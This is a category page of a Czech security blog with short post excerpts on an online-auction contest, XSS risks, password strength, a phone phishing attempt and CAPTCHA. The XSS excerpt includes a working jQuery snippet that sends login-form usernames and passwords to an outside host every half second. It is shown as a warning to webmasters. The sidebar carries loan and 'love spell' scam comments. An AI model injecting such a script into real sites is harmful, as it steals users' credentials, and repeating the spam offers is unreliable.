Bezpečnost a hacking | Michal Smrčka - blog

Aukro v nové soutěži odměnuje šikovné programátory

V těchto dnech probíhá na Aukro.cz soutěž „Aukro naděluje“. Každý den organizátoři umístí do nějaké náhodné sekce na Aukru relativně hodnotné produkty za směšně nízkou cenu. Je k dispozici vždy pouze 1 kus. Vy musíte tento produkt najít a zakoupit jako první.

O soutěži jsem se dozvěděl na Twitteru a nebýt následujícího odvážného prohlášení Aukra, ani bych se jí příliš nezaobíral:

foto

foto

„Nebojte, na roboty a podvodné programy jsme mysleli, takže tudy cesta nevede.“


18. 11. 2011 v 16:04 • Bezpečnost a hacking • autor Michal Smrčka87 komentářů

S XSS zranitelností se dá napáchat více škody, než si myslíte

Otázka pro webmastery: Víte, co dělá následující jQuery kód?

<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>

Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.

Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.


13. 11. 2010 v 20:45 • Bezpečnost a hacking • autor Michal Smrčka1 komentář

Na délce záleží! Jak zvolit správné heslo?

Průměrný uživatel používá k přihlášení na webové služby velmi slabá hesla. Tak slabá, že případný útočník dokáže za několik hodin, příp. dní heslo v plné své kráse odhalit. Lidé toto zbytečně podceňují, navíc zvolit si těžko prolomitelné heslo nemusí být vůbec složité!

Nejdříve pár čísel.

V souvislosti se statistikami hesel pocházejícími ze vzorku více než 800.000 uživatelských účtů vyplynuly tyto závěry: *

  • 9% uživatelů má heslo dlouhé jen 4 znaky nebo méně
  • ovšem heslo o maximální délce 6 znaků (pořád slabé) používá více než 50% lidí!
  • počet hesel, který dokáže počítač automaticky tipnout za jednu sekundu, se pohybuje mezi 20 a 100 za sekundu **
  • zjištění čtyřmístného hesla tedy brutal-force útokem zpravidla trval maximálně 40 hodin, v praxi je to ale mnohem méně
  • odhalení pětimístného hesla by bylo jisté maximálně za 24 dní, ovšem za předpokladu zapojení více paralelních počítačů je možné proces urychlit
  • pokud máte maximálně šestimístné heslo, prodloužila by se maximální doba zjištění na téměř 2,5 roku, nicméně také platí, že v případě zapojení více počítačů se doba zkrátí :)

20. 09. 2009 v 21:29 • Bezpečnost a hacking • autor Michal Smrčka20 komentářů

Řekněte mi, prosím, Vaše heslo...

Příchozí hovor z klasického telefonního čísla s předvolbou 776:

„Dobrý den, mluvím s panem Michalem Smrčkou?“
„Ano, u telefonu.“
„Vidím, že využíváte služby našeho operátora a měl bych pro Vás výhodnou nabídku. Nicméně potřeboval bych si Vás ověřit. Můžete mi, prosím, pro kontrolu sdělit Vaše osobní heslo?“

Jak byste zareagovali v mém případě?


21. 06. 2009 v 19:15 • Bezpečnost a hacking • autor Michal Smrčka3 komentáře

Zlo jménem Captcha (opisování znaků z obrázku)

Jsem zásadní odpůrce Captchy. Je to velmi účinná metoda, jak uživatele co nejvíce nasrat.

Captcha je řetězec znaků, který na některých webech musíte opsat z obrázku, abyste mohli přispět diskuzním příspěvkem, poslat e-mail prodejci atp. Důvodem má být zamezení automatického odesílání SPAMu skrz tyto formuláře nebo jiné strojové využití formulářů (roboti vygenerované znaky obvykle neumí rozpoznat a „opsat“).

  captcha

19. 04. 2009 v 11:11 • Bezpečnost a hacking • autor Michal Smrčka146 komentářů

Stránka: 1 2 >

Kategorie blogu

Twitter feed

Poslední články

Poslední komentáře

ROMANA JANA: Rychlá pujcka - prímý investor 50.000Kc až 60,000.000Kc. Pujcte si ješte dnes bezkonkurencní služby pro zamestnance, duchodce, osvc, dpp, úp. Peníze cerpáte okamžite. Jednoduché podmínky, Jasná smlouva Pro bližší informace volejte: kdfin11@gmail.com Ukázat
Nabídka půjček: Nabídka půjček Hledáte půjčku na oživení svých aktivit, ať už na realizaci projektu, nebo potřebujete peníze z jiných důvodů nebo z čeho chcete. Jsme připraveni zapůjčit každému, kdo je schopen splnit podmínky pro vrácení peněz. Sdělte mi prosím částku vaší žádosti o půjčku a... Ukázat
Lenka Bolkova: Rychlá a pohodlná finanční půjčka, kterou můžete použít na cokoli. Nízká úroková sazba 2% je stabilní po celou dobu splácení úvěru. Díky široké škále poskytovaných finančních půjček může tuto půjčku získat téměř každý žadatel v zemi. Jasná a srozumitelná smlouva, jasné podmínky služby.... Ukázat
Lenka Bolkova: Půjčky do 24 hodin pro celou zemi. Soukromá úvěrová společnost je otevřena 24 hodin, 7 dní v týdnu. Půjčky poskytujeme online až do výše 25 milionů až 300 měsíců rychle a bez zbytečných formalit, nebo dokonce bez opuštění vašeho domova. Splátky od 1 000,... Ukázat
Denis Zvonimir: AUTENTICKÁ LÁSKA PRÁCE PRÁCE ZA 48 HODIN Svou bývalou přítelkyni jsem měl zpět s pomocí DR ISIKOLO na isikolosolutionhome@gmail.com. Viděl jsem lidi, kteří psali svědectví o kouzlu, s nímž byli požehnáni, a kterým tedy chci také říct můj. Také s těmito svědectvími jsem se... Ukázat

Vyhledávání

Nastavení

Velikost písma: Abc Abc Abc